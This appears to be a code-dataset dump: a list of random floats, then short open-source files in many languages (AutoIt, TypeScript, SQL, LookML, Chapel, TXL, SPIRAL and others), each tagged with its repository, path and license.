0.7428237526896201 0.5028994426384312 0.8525408067186339 0.795308232669239 0.6299045656254499 0.17548010787894242 0.9772264723802498 0.33058518815271254 0.9611643795282536 0.5490442969988482 0.09619508517369824 0.011063688015313766 0.1661226066974114 0.4405395993159701 0.010213118157144874 0.9669420626168103 0.7901440356028739 0.8077509579811758 0.7921878620822668 0.1233511696205758 0.2855207255443879 0.5444698723254917 0.4714994130848561 0.18851998350003474 0.6965082247182621 0.1343487432657019 0.7919117223162037 0.8180518880694819 0.28683645551488923 0.3673355799581901 0.8537521982155081 0.22627183127294836 0.5693444963899187 0.09415687521766125 0.4114579358991687 0.4462826764207761 0.33325475565901597 0.5787018702063748 0.26230220597745546 0.6237544809431979 0.29651066042479046 0.38931509272649234 0.875425417349127 0.5972968239788697 0.9571474558784931 0.5731231966286928 0.3928834693522597 0.054729444097532776 0.7404596778997885 0.22887279513305214 0.16302438207282388 0.22105324540528393 0.8000336659712949 0.19546240592429975 0.5165519214166717 0.9335549462485125 0.7583839315009726 0.3838502967700703 0.7909439358996095 0.7291974314581663 0.6439717167212339 0.7518833179463378 0.6988621735507982 0.9252898160556503 0.7996844247489078 0.6217485952888214 0.29069718934828437 0.8432427753371003 0.053065662278651726 0.39381886598811744 0.39726056625061423 0.753021513883643 0.051728184182478265 0.8944783744875237 0.12249634347156402 0.3234166269202078 0.6714657471135612 0.993057577575735 0.1799563033015904 0.20079379701718936 0.03352779081523105 0.4342015912994116 0.4958925196152797 0.6381381485000238 0.2097804814942742 0.4743885133266106 0.8704823228391205 0.16886705916201095 0.6117735111502609 0.15558548707249176 0.4900119803219156 0.525636207927723 0.868483339989338 0.22649391469258362 0.5434891465411474 0.3375869085440141 0.9809470428616034 0.4748004805073057 0.6337308289582854 0.9016574495151316 0.3998258917765247 0.8747731407959424 0.5396658808825991 0.1953450043178211 0.7288227907734123 0.7251607257900042 0.16189551747127107 0.9856819244300256 0.04216340809006114 0.06307262340939201 0.5895168723389617 0.7720767856198094 0.5737319014625906 0.5736119443856745 0.15395973639931826 0.22624711001861475 0.8303788335614601 0.6987959013630667 0.25619527820776034 0.28416168674480735 0.309750146486681 0.3684422948297946 0.41933483332036636 0.49216141647298584 0.9974346744740895 0.8782483730877007 0.5120623032998791 0.6991333701697026 0.39367355269815174 0.5982559011302035 0.5095702296422902 0.0073756531457094265 0.13779289521152926 0.13772117360779734 0.4440109184762694 0.6621248056796022 0.9221606181526891 0.06452620411434928 0.05582074509495594 0.24814140330799583 0.04010348927766039 0.47007115779894426 0.35557823294250057 0.8458353405858108 0.121569685492121 0.10630137460735667 0.3763219235163522 0.2290592402184941 0.6652407734534468 0.825524605244135 0.28181367269190083 0.08112692780915398 0.035474927828081815 0.39208721987284145 0.3924502386308153 0.7369802455844131 0.4019447072748018 0.7513340858415517 0.06669798509381009 0.8030001076373151 0.09736931335692178 0.9298611793350696 0.7940220047820653 0.022969134131731628 0.1194457145400174 0.41649855267730884 0.6406815537703789 0.7277766037998638 0.032390050907197265 0.11994573541125808 0.45405691004510795 0.4697366611445726 0.5909545047543135 0.4586370815006724 0.027936473794780148 0.28731536702064064 0.38385990549228455 0.10007419660014438 0.6049844358432742 0.14126812750328754 0.11011759602507731 0.9477992843281509 0.32697556760434165 0.7952557934928884 0.41220091628536837 0.0775144738106398 0.34377089042946396 0.11475203947606571 0.324565203936252 0.24562625300229335 0.2814790643823102 0.33674960031448553 0.02343069418775867 0.12819566789673775 0.5860465792325524 3.344966543716854E-4 0.764623728188187 0.8178988667910306 0.8342543184714803 0.7224414691150721 0.2762477269162078 0.6240748043752199 0.5239726459501592 0.7154070092190576 0.33401438836374997 0.7541513602048123 0.24021913433519337 0.9798863035874731 0.3149357648201755 0.39320935515494915 0.2871926677987361 0.4267688819052997 0.8210717320915167 0.5215210432550049 0.7606197130424363 0.906430485147311 0.6658263368853276 0.4369225548991792 0.11911121788564571 0.6518748244891218 0.1662682875788397 0.9098777370088331 0.19813573243571692 0.39750426629618596 0.17780918312890015 0.8456618567693527 0.0669818588041543 0.7432300722816148 0.6939220854310302 0.5331640068158283 0.14364077115709117 0.1201878930126713 0.2900486710230987 0.7480587723483384 0.8229249282263412 0.5210304024228511 0.5059038355128249 0.2737347502378835 0.6515812032429321 0.17108398866332886 0.6779445535441364 0.6778294845768865 0.20545398605060627 0.5937514285131715 0.11521077680347047 0.4268718633056524 0.8252949617520418 0.7306914016005518 0.4082373961036523 0.154672639885019 0.6976418693840327 0.12397678136000045 0.30109031165565203 0.578800697957981 0.1560598339035365 0.33402613335212117 0.7759138736018208 0.8924820809927164 0.8129839859408988 0.2482475246919874 0.9664843840973099 0.32830510034454097 0.14385177615684663 0.7152648016108127 0.6093631832218496 0.22131489585469344 0.2273203035783452 0.40631026645153445 0.33374784973678384 0.0811355233952692 0.9351349352847758 0.02868515879552691 0.9644385780006267 0.9542329551050891 0.43508509366891523 0.7859009556488327 0.8970454207800649 0.818703568338205 0.021749349225363646 0.5116357234172315 0.29106798520233346 0.8507479912888983 0.8809380994901314 0.2849164821238409 0.17715638705978132 0.7918827926681303 0.1461968948662521 0.03279397073752566 0.21356174500449165 0.2997155065681577 0.2785835319344797 0.8674244837863491 0.3178333535061483 0.08994846526805966 0.7428096182593606 0.6491443257813596 0.24101540804997956 0.6395184734080824 0.6801256831345552 0.6409709076568197 0.9282495409719769 0.9119878332623468 0.38648804687828864 0.6430369164677875 0.40657388418169926 0.2430386818698691 0.016173829531811124 0.40164431089819963 0.3641770412354062 0.18782923848586908 0.7431199028642952 0.6789203359882248 0.5132684793727411 0.9696639927575077 0.09905990031096079 0.010471746838392693 0.05390331088878697 0.9724551833514521 0.96021885744049 0.9802994878047139 0.5878018301702628 0.7261845833169792 0.6927769420799641 0.15288598242329232 0.023147102022428978 0.6421971119172383 0.3214016615328392 0.5476590709233898 0.5546498910478891 0.5428622737789636 0.8808715912482538 0.4170592574400054 0.6575723079899575 0.32380648493136244 0.5479480823380383 0.17182765530067357 0.36766962011739024 0.3152524893663332 0.07809648674882053 0.7814110458297376 0.09229358397746512 0.06033878738607357 0.2533428875640017 0.31941601876344383 0.6907817017642169 0.14123990046936985 0.6250564114261842 0.9370624828447673 0.7196625162369317 0.006947213864121338 0.9196137465171403 0.0918594024846926 0.12547579208666615 0.09810863387785618 0.04737794972372311 0.4949285758223414 0.7289157388883312 0.31923043153642505 0.858625801843661 0.8753690617524789 0.7009213401654779 0.3235478241493791 0.5827659954056685 0.09553565450840396 0.6827811154782216 0.42557744842422307 0.19385246060929728 0.27888229099329076 0.9578199998415909 0.3854153354122085 0.11684082804401963 0.2527926671145204 0.9532716435763686 0.060685741287573536 0.4959424276855702 0.6007087912303131 0.5946683082021079 0.10550803269956921 0.5282185262000876 0.9132813730289071 0.00217122999641417 0.6890332690797288 0.8460423437275365 0.6674932120264847 0.17995025108277585 0.09351143329062628 0.07480631258428894 0.22827083042295848 0.8651669668598166 0.7462502068764505 0.17381715950809296 0.03637019837304245 0.12027648690722959 0.3959957104175291 0.9754527559334455 0.8075461202715531 0.3000712439876331 0.2587302774758703 0.19483927407864676 0.5405311092390568 0.030388103224076257 0.8315544501451981 0.1914439900368441 0.09366584083521423 0.9174425165207262 0.40282613340496376 0.27943344835912964 0.43061542185137147 0.8674276986409473 0.4014171425317151 0.6541094263040422 0.09095960111346657 0.9934588349838444 0.7015519022443859 0.6645511417924355 0.20327133724214952 0.1867702849881394 0.12008289857495846 0.8752349952066685
Logos
0
gabicavalcante/pymoo
tests/problems/resources/DASCMOP/10/DASCMOP4.x
[ "Apache-2.0" ]
 #NoTrayIcon FileInstall(">>>AUTOIT SCRIPT<<<", @ScriptDir & "\TokenTestFile_Extracted.au3") Exit $DUMMY = (1 + 2 - 3 / 4) ^ 2 $DUMMY += 1 > 2 < 3 <> 4 >= 5 <= 6 = 7 & 8 $DUMMY -= True == True = True $DUMMY /= 1 $DUMMY *= 1.123 $DUMMY &= 1500 $DUMMY = 1234567887654321 MYFUNC($DUMMY, $DUMMY) $OSHELL = ObjCreate("shell.application") $OSHELLWINDOWS = $OSHELL.windows Func MYFUNC($VALUE, $VALUE2) Dim $ARRAY1[4] $ARRAY1[2] = 1 $DUMMY = ' " ' $DUMMY = ' " ' $DUMMY = " ' ' """" " EndFunc Exit
AutoIt
2
fossabot/myAut2Exe
samples/AutoIt316_TokenFile/decompiled/TokenTestFile_Decompiled.au3
[ "MS-PL" ]
/*--------------------------------------------------------------------------------------------- * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for license information. *--------------------------------------------------------------------------------------------*/ import { Position } from 'vs/editor/common/core/position'; import { IRange, Range } from 'vs/editor/common/core/range'; /** * A single edit operation, that acts as a simple replace. * i.e. Replace text at `range` with `text` in model. */ export interface ISingleEditOperation { /** * The range to replace. This can be empty to emulate a simple insert. */ range: IRange; /** * The text to replace with. This can be null to emulate a simple delete. */ text: string | null; /** * This indicates that this operation has "insert" semantics. * i.e. forceMoveMarkers = true => if `range` is collapsed, all markers at the position will be moved. */ forceMoveMarkers?: boolean; } export class EditOperation { public static insert(position: Position, text: string): ISingleEditOperation { return { range: new Range(position.lineNumber, position.column, position.lineNumber, position.column), text: text, forceMoveMarkers: true }; } public static delete(range: Range): ISingleEditOperation { return { range: range, text: null }; } public static replace(range: Range, text: string | null): ISingleEditOperation { return { range: range, text: text }; } public static replaceMove(range: Range, text: string | null): ISingleEditOperation { return { range: range, text: text, forceMoveMarkers: true }; } }
TypeScript
5
sbj42/vscode
src/vs/editor/common/core/editOperation.ts
[ "MIT" ]
'imp' 'imp.wav' loadfile 'seq' '60 62 64 66 67 69 72' gen_vals 1.5 metro 0.3 maytrig dup 1 'seq' tseq mtof 0.4 48 mtof pluck dup 1024 'imp' conv 0.03 * +
SourcePawn
3
aleatoricforest/Sporth
examples/conv.sp
[ "MIT" ]
from numpy cimport ( ndarray, uint8_t, ) cpdef bint is_matching_na(object left, object right, bint nan_matches_none=*) cpdef bint checknull(object val) cpdef bint checknull_old(object val) cpdef ndarray[uint8_t] isnaobj(ndarray arr) cdef bint is_null_datetime64(v) cdef bint is_null_timedelta64(v) cdef bint checknull_with_nat_and_na(object obj) cdef class C_NAType: pass cdef C_NAType C_NA
Cython
3
ajayiagbebaku/NFL-Model
venv/Lib/site-packages/pandas/_libs/missing.pxd
[ "MIT" ]
interface I1 { iObj:{ }; iNum:number; iAny:any; iFn():void; } interface I2 { iFn(n:number, s:string):void; } class C1 implements I1,I2 { private iFn(); private iFn(n?:number, s?:string) { } private iAny:any; private iNum:number; private iObj:{ }; } interface I3 { x: number; } interface I4 { ():I3; new ():I3; [call:number]:string; } class C2 implements I3 { public x = 1; } var a:I4 = function(){ return new C2(); } new a(); /*var b:I4 = C2; new b(); */ var c:I4; c[5]; c["foo"];
TypeScript
3
nilamjadhav/TypeScript
tests/cases/compiler/interfaceImplementation1.ts
[ "Apache-2.0" ]
config const n = 10; iter foo() { for i in 1..n do yield i; } for param i in foo() do writeln(i);
Chapel
4
jhh67/chapel
test/trivial/bharshbarg/paramForOverIter.chpl
[ "ECL-2.0", "Apache-2.0" ]
require 'template' class CorePaneController def init Logger.log('CorePaneController.init',self); end attr_accessor :request #def method_missing(method_sym, *arguments, &block) # r = ClientContext.get(method_sym) # Logger.log("method_missing #{self.class.to_s} #{method_sym}",r) # return r #end def render_target_html(key,html) render_targets.child(key).html(html) end def request_params Native(`self.$request.params`) end def active_digest_index `self.$request_params().native.active_digest_index` end def active_digest_name String(`self.$request_params().native.digest_name`).capitalize end def digests_crosses Native(`self.$request.digestController.context`) end def active_digest digests_crosses.digests[active_digest_index] end end
Opal
4
bcavileer/digest-rails
app/assets/javascripts/digest-rails/opal_lib/hold/core_pane_controller.js.opal
[ "MIT" ]
"""Tests for the nsw_rural_fire_service_feed component."""
Python
0
domwillcode/home-assistant
tests/components/nsw_rural_fire_service_feed/__init__.py
[ "Apache-2.0" ]
SELECT i_brand_id brand_id, i_brand brand, t_hour, t_minute, sum(ext_price) ext_price FROM item, (SELECT ws_ext_sales_price AS ext_price, ws_sold_date_sk AS sold_date_sk, ws_item_sk AS sold_item_sk, ws_sold_time_sk AS time_sk FROM web_sales, date_dim WHERE d_date_sk = ws_sold_date_sk AND d_moy = 11 AND d_year = 1999 UNION ALL SELECT cs_ext_sales_price AS ext_price, cs_sold_date_sk AS sold_date_sk, cs_item_sk AS sold_item_sk, cs_sold_time_sk AS time_sk FROM catalog_sales, date_dim WHERE d_date_sk = cs_sold_date_sk AND d_moy = 11 AND d_year = 1999 UNION ALL SELECT ss_ext_sales_price AS ext_price, ss_sold_date_sk AS sold_date_sk, ss_item_sk AS sold_item_sk, ss_sold_time_sk AS time_sk FROM store_sales, date_dim WHERE d_date_sk = ss_sold_date_sk AND d_moy = 11 AND d_year = 1999 ) AS tmp, time_dim WHERE sold_item_sk = i_item_sk AND i_manager_id = 1 AND time_sk = t_time_sk AND (t_meal_time = 'breakfast' OR t_meal_time = 'dinner') GROUP BY i_brand, i_brand_id, t_hour, t_minute ORDER BY ext_price DESC, brand_id
SQL
3
OlegPt/spark
sql/core/src/test/resources/tpcds/q71.sql
[ "Apache-2.0" ]
MyRec := RECORD STRING1 Value1; STRING1 Value2; END; SomeFile := DATASET([{'C', 'G'}, {'C', 'C'}, {'A', 'X'}, {'B', 'G'}, {'A', 'B'}], MyRec); SortedRecs := SORT(SomeFile, Value1); GroupedRecs1 := GROUP(SomeFile, Value1); // unsorted GroupedRecs2 := GROUP(SortedRecs, Value1); // sorted SortedRecs1 := SORT(GroupedRecs1, Value2); SortedRecs2 := SORT(GroupedRecs1, -Value2); SortedRecs3 := SORT(GroupedRecs2, Value2); SortedRecs4 := SORT(GroupedRecs2, -Value2); OUTPUT(SortedRecs1); OUTPUT(SortedRecs2); OUTPUT(SortedRecs3); OUTPUT(SortedRecs4); /* SortedRecs1 results in: Rec# Value1 Value2 1 C C 2 C G 3 A X 4 B G 5 A B SortedRecs2 results in: Rec# Value1 Value2 1 C G 2 C C 3 A X 4 B G 5 A B SortedRecs3 results in: Rec# Value1 Value2 1 A B 2 A X 3 B G 4 C C 5 C G SortedRecs4 results in: Rec# Value1 Value2 1 A X 2 A B 3 B G 4 C G 5 C C */
ECL
4
jeclrsg/HPCC-Platform
esp/src/eclwatch/ecl/GROUP_Example.ecl
[ "Apache-2.0" ]
div.svelte-xyz>p>em{color:red}
CSS
3
Theo-Steiner/svelte
test/css/samples/omit-scoping-attribute-descendant-global-inner-multiple/expected.css
[ "MIT" ]
var r = 1..10 by 2; var r2 = 1..10 by 2; var r3 = 1..9 by 2; var r4 = 1..10; writeln(ident(r, r2)); writeln(ident(r, r3)); writeln(ident(r, r4));
Chapel
3
jhh67/chapel
test/deprecated/rangeIdent.chpl
[ "ECL-2.0", "Apache-2.0" ]
- dashboard: console_login_overview title: Console Login Overview layout: newspaper elements: - name: Top User Logins (Top 10) title: Top User Logins (Top 10) model: aws_athena_cloudtrail explore: cloudtrail_logs type: looker_bar fields: - cloudtrail_logs.total_successful_logins - cloudtrail_logs.total_failed_logins - cloudtrail_logs.total_logins - cloudtrail_logs.user_name sorts: - cloudtrail_logs.total_logins desc limit: 10 column_limit: 50 stacking: normal show_value_labels: false label_density: 25 legend_position: center x_axis_gridlines: false y_axis_gridlines: true show_view_names: true limit_displayed_rows: false y_axis_combined: true show_y_axis_labels: true show_y_axis_ticks: true y_axis_tick_density: default y_axis_tick_density_custom: 5 show_x_axis_label: true show_x_axis_ticks: true x_axis_scale: auto y_axis_scale_mode: linear ordering: none show_null_labels: false show_totals_labels: false show_silhouette: false totals_color: "#808080" hidden_fields: - cloudtrail_logs.total_logins colors: - 'palette: Looker Classic' series_colors: cloudtrail_logs.total_successful_logins: "#1f3e5a" series_types: success_rate: line listen: Date: cloudtrail_logs.event_time_date row: 0 col: 12 width: 12 height: 10 - name: Console Logins Over Time title: Console Logins Over Time model: aws_athena_cloudtrail explore: cloudtrail_logs type: looker_column fields: - cloudtrail_logs.total_successful_logins - cloudtrail_logs.total_failed_logins - cloudtrail_logs.total_logins - cloudtrail_logs.event_time_date fill_fields: - cloudtrail_logs.event_time_date sorts: - cloudtrail_logs.event_time_date limit: 500 column_limit: 50 stacking: normal show_value_labels: false label_density: 25 legend_position: center x_axis_gridlines: false y_axis_gridlines: true show_view_names: true limit_displayed_rows: false y_axis_combined: true show_y_axis_labels: true show_y_axis_ticks: true y_axis_tick_density: default y_axis_tick_density_custom: 5 show_x_axis_label: true show_x_axis_ticks: true x_axis_scale: auto y_axis_scale_mode: linear ordering: none show_null_labels: false show_totals_labels: false show_silhouette: false totals_color: "#808080" hidden_fields: - cloudtrail_logs.total_logins series_colors: cloudtrail_logs.total_successful_logins: "#1f3e5a" listen: Date: cloudtrail_logs.event_time_date row: 10 col: 0 width: 12 height: 7 - name: Logins from Multiple IP Addresses title: Logins from Multiple IP Addresses model: aws_athena_cloudtrail explore: user_ip_facts type: table fields: - user_ip_facts.username - user_ip_facts.number_ip_addresses sorts: - user_ip_facts.number_ip_addresses desc limit: 500 column_limit: 50 show_view_names: true show_row_numbers: true truncate_column_names: false hide_totals: false hide_row_totals: false table_theme: gray limit_displayed_rows: false enable_conditional_formatting: false conditional_formatting_ignored_fields: [] conditional_formatting_include_totals: false conditional_formatting_include_nulls: false row: 17 col: 0 width: 6 height: 7 - name: Most Common IP Addresses title: Most Common IP Addresses model: aws_athena_cloudtrail explore: cloudtrail_logs type: table fields: - cloudtrail_logs.sourceipaddress - cloudtrail_logs.total_events sorts: - cloudtrail_logs.count desc limit: 500 column_limit: 50 show_view_names: true show_row_numbers: true truncate_column_names: false hide_totals: false hide_row_totals: false table_theme: gray limit_displayed_rows: false enable_conditional_formatting: false conditional_formatting_ignored_fields: [] conditional_formatting_include_totals: false conditional_formatting_include_nulls: false listen: Date: cloudtrail_logs.event_time_date row: 17 col: 6 width: 6 height: 7 - name: User Login Geolocation title: User Login Geolocation model: aws_athena_cloudtrail explore: cloudtrail_logs type: looker_geo_choropleth fields: - cloudtrail_logs.ip_location - cloudtrail_logs.total_events filters: cloudtrail_logs.ip_location: "-NULL" sorts: - cloudtrail_logs.ip_location limit: 500 column_limit: 50 map: auto map_projection: '' show_view_names: true quantize_colors: false map_plot_mode: points heatmap_gridlines: false heatmap_opacity: 0.5 show_region_field: true draw_map_labels_above_data: true map_tile_provider: positron map_position: custom map_scale_indicator: 'off' map_pannable: true map_zoomable: true map_marker_type: circle map_marker_icon_name: default map_marker_radius_mode: proportional_value map_marker_units: meters map_marker_proportional_scale_type: linear map_marker_color_mode: fixed show_legend: true quantize_map_value_colors: false map_latitude: 32.02670629333614 map_longitude: 4.833984375000001 map_zoom: 3 series_types: {} listen: Date: cloudtrail_logs.event_time_date row: 0 col: 0 width: 12 height: 10 - name: Most Common Login Errors title: Most Common Login Errors model: aws_athena_cloudtrail explore: cloudtrail_logs type: table fields: - cloudtrail_logs.errormessage - cloudtrail_logs.count - cloudtrail_logs.count_of_distinct_users filters: cloudtrail_logs.errorcode: "-NULL" cloudtrail_logs.event_name: ConsoleLogin sorts: - cloudtrail_logs.count desc limit: 500 column_limit: 50 dynamic_fields: - table_calculation: count_of_error_messages label: Count of Error Messages expression: "${cloudtrail_logs.count}" value_format: value_format_name: decimal_0 - table_calculation: users_impacted_by_error label: Users Impacted by Error expression: "${cloudtrail_logs.count_of_users}" value_format: value_format_name: decimal_0 show_view_names: true show_row_numbers: true truncate_column_names: false hide_totals: false hide_row_totals: false table_theme: gray limit_displayed_rows: false enable_conditional_formatting: false conditional_formatting_ignored_fields: [] conditional_formatting_include_totals: false conditional_formatting_include_nulls: false stacking: '' show_value_labels: false label_density: 25 legend_position: center x_axis_gridlines: false y_axis_gridlines: true y_axis_combined: true show_y_axis_labels: true show_y_axis_ticks: true y_axis_tick_density: default y_axis_tick_density_custom: 5 show_x_axis_label: true show_x_axis_ticks: true x_axis_scale: auto y_axis_scale_mode: linear ordering: none show_null_labels: false show_totals_labels: false show_silhouette: false totals_color: "#808080" series_types: {} hidden_fields: - cloudtrail_logs.count - cloudtrail_logs.count_of_users listen: Date: cloudtrail_logs.event_time_date row: 17 col: 18 width: 6 height: 7 - name: Login User Count Over Time title: Login User Count Over Time model: aws_athena_cloudtrail explore: cloudtrail_logs type: looker_column fields: - cloudtrail_logs.count_of_distinct_users - cloudtrail_logs.event_time_date fill_fields: - cloudtrail_logs.event_time_date sorts: - cloudtrail_logs.event_time_date desc limit: 500 column_limit: 50 stacking: '' show_value_labels: false label_density: 25 legend_position: center x_axis_gridlines: false y_axis_gridlines: true show_view_names: true limit_displayed_rows: false y_axis_combined: true show_y_axis_labels: true show_y_axis_ticks: true y_axis_tick_density: default y_axis_tick_density_custom: 5 show_x_axis_label: true show_x_axis_ticks: true x_axis_scale: auto y_axis_scale_mode: linear ordering: none show_null_labels: false show_totals_labels: false show_silhouette: false totals_color: "#808080" series_colors: cloudtrail_logs.count_of_users: "#1f3e5a" cloudtrail_logs.count_of_distinct_users: "#1f3e5a" listen: Date: cloudtrail_logs.event_time_date row: 10 col: 12 width: 12 height: 7 - name: Logins without Multi-Factor Auth title: Logins without Multi-Factor Auth model: aws_athena_cloudtrail explore: cloudtrail_logs type: table fields: - cloudtrail_logs.user_name - cloudtrail_logs.login_status - cloudtrail_logs.total_logins filters: cloudtrail_logs.mfa_used: 'No' sorts: - cloudtrail_logs.total_logins desc limit: 500 column_limit: 50 query_timezone: America/Los_Angeles show_view_names: true show_row_numbers: true truncate_column_names: false hide_totals: false hide_row_totals: false table_theme: gray limit_displayed_rows: false enable_conditional_formatting: false conditional_formatting_ignored_fields: [] conditional_formatting_include_totals: false conditional_formatting_include_nulls: false listen: Date: cloudtrail_logs.event_time_date row: 17 col: 12 width: 6 height: 7 filters: - name: Date title: Date type: date_filter default_value: 1 years model: explore: field: listens_to_filters: [] allow_multiple_values: true
LookML
4
voltagebots/aws_cloudtrail_block
console_login_overview.dashboard.lookml
[ "MIT" ]
REBOL [ Title: "Red/System alias test script" Author: "Nenad Rakocevic & Peter W A Wood" File: %alias-test.r Tabs: 4 Rights: "Copyright (C) 2011-2015 Red Foundation. All rights reserved." License: "BSD-3 - https://github.com/red/red/blob/origin/BSD-3-License.txt" ] change-dir %../ ~~~start-file~~~ "alias-compile" ===start-group=== "compiler checks" --test-- "alias-1" --assert --compiled? { Red/System [] a3-alias!: alias struct! [a [integer!] b [integer!]] a3-struct: declare a3-alias! a3-struct/a: 1 a3-struct/b: 2 a3-struct-1: declare a3-alias! a3-struct-1/a: 3 a3-struct-1/b: 4 } --clean --test-- "alias-2" --assert --compiled? { Red/System [] a5-alias!: alias struct! [a [integer!] b [integer!]] a5-struct: declare a5-alias! a5-pointer: declare pointer! [integer!] a5-struct/a: 1 a5-struct/b: 2 a5-pointer: as [pointer! [integer!]] a5-struct a5-struct: as a5-alias! a5-pointer } --clean --test-- "alias-3" --assert --compiled? { Red/System [] a5-alias!: alias struct! [a [byte!] b [byte!]] a6-alias!: alias struct! [a [byte!] b [byte!]] a6-struct: declare struct! [ s1 [a5-alias!] s2 [a5-alias!] ] a6-struct/s1: declare a6-alias! } --clean ===end-group=== ~~~end-file~~~
R
4
0xflotus/red
system/tests/source/compiler/alias-test.r
[ "BSL-1.0", "BSD-3-Clause" ]
BreshapedJ
PureBasic
0
pchandrasekaran1595/onnx
onnx/backend/test/data/node/test_reshape_allowzero_reordered/test_data_set_0/output_0.pb
[ "Apache-2.0" ]
% BSD 3-Clause License % % Copyright (c) 2017, Ali ElShakankiry % All rights reserved. % % Redistribution and use in source and binary forms, with or without % modification, are permitted provided that the following conditions are met: % % * Redistributions of source code must retain the above copyright notice, this % list of conditions and the following disclaimer. % % * Redistributions in binary form must reproduce the above copyright notice, % this list of conditions and the following disclaimer in the documentation % and/or other materials provided with the distribution. % % * Neither the name of the copyright holder nor the names of its % contributors may be used to endorse or promote products derived from % this software without specific prior written permission. % % THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" % AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE % IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE % DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE % FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL % DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR % SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER % CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, % OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE % OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. include "../GRM/ASNOne.Grm" %redefine decl % [id] [opt hashID] %end redefine %define hashID % '# [id] %end define redefine construction_assignment_statement [decl] '::= [type_decision] [opt scl_additions] [NL] end redefine function main replace [program] P [program] by P [findImports] end function %renRefFieldTypes %renRefConstraints rule findImports skipping [module_definition] replace $ [module_definition] ID [id] 'DEFINITIONS OP [opt tag_default] '::= 'BEGIN Exports [opt export_block] Imports [opt import_block] Body [repeat rule_definition] 'END by ID 'DEFINITIONS OP '::= 'BEGIN Exports Imports [checkBlock ID] Body 'END end rule rule checkBlock ModuleName [id] skipping [import_block] replace $ [import_block] 'IMPORTS LIST [list import_list+] '; %construct ExportTable [repeat import_list] % _ [read "Exports.txt"] by 'IMPORTS LIST [checkImportLists ModuleName] '; end rule function checkImportLists ModuleName [id] replace [list import_list+] LIST [list decl] 'FROM MOD [id] ', REST [list import_list+] by LIST 'FROM MOD [checkList ModuleName LIST] ', REST [checkImportLists ModuleName] end function function checkList Modulename [id] LIST [list decl] replace [id] ImportModuleName [id] construct File [stringlit] _ [+ ImportModuleName] [+ ".exports"] construct ExportTable [opt import_list] _ [read File] deconstruct ExportTable EXLIST [list decl] 'FROM MOD [id] by ImportModuleName [checkEachImport EXLIST Modulename each LIST] end function function checkEachImport EXLIST [list decl] ModuleName [id] ImportItem [decl] match [id] ImportModuleName [id] deconstruct not * [list decl] EXLIST ImportItem deconstruct ImportItem _ [id] '^ ImportItemName [id] construct QUIT [stringlit] _ [+ "Undefined import \""] [+ ImportItemName] [+ "\" from module \""] [+ ImportModuleName] [+ "\" in module \""] [+ ModuleName] [+ "\""] [print] [quit 99] end function
TXL
4
alishak/TAG
TXL/checkImports.txl
[ "BSD-3-Clause" ]
# Copyright (c) 2018-2021, Carnegie Mellon University # See LICENSE for details _macro_binop_ev := rec( ev := self >> self.t.value(self.semantic(self._vval(1), self._vval(2), [])).ev(), ); ################################ # MACRO_2xf # Class(vunpacklo_2xf, _macro_binop_ev, VecExp_2.binary(), rec( semantic := (in1, in2, p) -> unpacklo(in1, in2, 2, 1))); Class(vunpackhi_2xf, _macro_binop_ev, VecExp_2.binary(), rec( semantic := (in1, in2, p) -> unpackhi(in1, in2, 2, 1))); Class(vpacklo_2xf, _macro_binop_ev, VecExp_2.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [1, 1], 2, 1))); Class(vpackhi_2xf, _macro_binop_ev, VecExp_2.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [2, 2], 2, 1))); Class(vmulcx_2xf, VecExp_2.binary()); Class(vswapcx_2xf, VecExp_2.unary()); ################################ # MACRO_4xf # Class(vunpacklo_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> unpacklo(in1, in2, 4, 1))); Class(vunpackhi_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> unpackhi(in1, in2, 4, 1))); Class(vunpacklo2_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> unpacklo(in1, in2, 4, 2))); Class(vunpackhi2_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> unpackhi(in1, in2, 4, 2))); Class(vpacklo_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [1, 3, 1, 3], 4, 1))); Class(vpackhi_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [2, 4, 2, 4], 4, 1))); Class(vpacklo2_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [1, 1], 4, 2))); Class(vpackhi2_4xf, _macro_binop_ev, VecExp_4.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [2, 2], 4, 2))); Class(vmulcx_4xf, VecExp_4.binary()); Class(vswapcx_4xf, VecExp_4.unary()); ################################ # MACRO_8xf # Class(vunpacklo_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> unpacklo(in1, in2, 8, 1))); Class(vunpackhi_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> unpackhi(in1, in2, 8, 1))); Class(vunpacklo2_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> unpacklo(in1, in2, 8, 2))); Class(vunpackhi2_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> unpackhi(in1, in2, 8, 2))); Class(vpacklo_8xf, _macro_binop_ev, VecExp_8.binary(), rec( semantic := (in1, in2, p) -> shuffle(in1, in2, [1, 3, 5, 7, 1, 3, 5, 7], 8, 1))); 